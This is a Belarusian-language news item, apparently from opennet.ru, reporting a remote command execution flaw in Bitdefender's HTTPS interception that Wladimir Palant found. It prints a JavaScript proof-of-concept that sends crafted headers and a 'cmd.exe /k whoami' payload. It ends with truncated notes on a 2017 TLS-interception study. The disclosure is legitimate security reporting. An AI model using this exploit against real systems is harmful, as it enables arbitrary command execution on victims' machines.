Уладзімір Палант, стваральнік Adblock Plus,
Чыннік праблемы ў тым, што антывірус Bitdefender выконвае лакальны перахоп HTTPS-трафіку праз падмену арыгінальнага TLS-сертыфіката сайта. На сістэме кліента ўстанаўліваецца дадатковы каранёвы сертыфікат, які дазваляе схаваць працу прымяняецца сістэмы інспектавання трафіку. Антывірус укліньваецца ў абаронены трафік і падстаўляе ў некаторыя старонкі ўласны JavaScript-код для рэалізацыі функцыі Safe Search, а ў выпадку праблем з сертыфікатам абароненага злучэння падмяняе выдаваную старонку з памылкай на ўласную. Так як новая старонка з памылкай выдаецца ад імя адчынянага сервера, іншыя старонкі дадзенага сервера маюць поўны доступ да змесціва, які ўстаўляецца Bitdefender.
Пры адкрыцці падкантрольнага зламысніку сайта гэты сайт можа адправіць запыт XMLHttpRequest і сімуляваць пры адказе праблемы з HTTPS-сертыфікатам, што прывядзе да вяртання старонкі з памылкай, падмененай Bitdefender. Бо старонка з памылкай адчыненая ў кантэксце дамена атакавалага, ён можа прачытаць змесціва падмененай старонкі з параметрамі Bitdefender. На старонцы, якая падстаўляецца Bitdefender, у тым ліку прысутнічае сесійны ключ, які дазваляе пры дапамозе ўнутранага API Bitdefender запусціць асобны сеанс браўзэра Safepay, паказаўшы пры гэтым адвольныя сцягі каманднага радка, і дамагчыся запуску любых сістэмных каманд пры дапамозе сцяга «—utility-cmd-prefix». Прыклад эксплоіту (param1 і param2 — значэнні, атрыманыя са старонкі з памылкай):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada -utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Нагадаем, што праведзенае ў 2017 годзе даследаванне
Актуальныя наборы шыфраў даваліся толькі ў 11 з 26 прадуктаў. 5 сістэм не ажыццяўлялі верыфікацыю сертыфікатаў (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Прадукты Kaspersky Internet Security і Total Security былі схільныя нападу
Крыніца: opennet.ru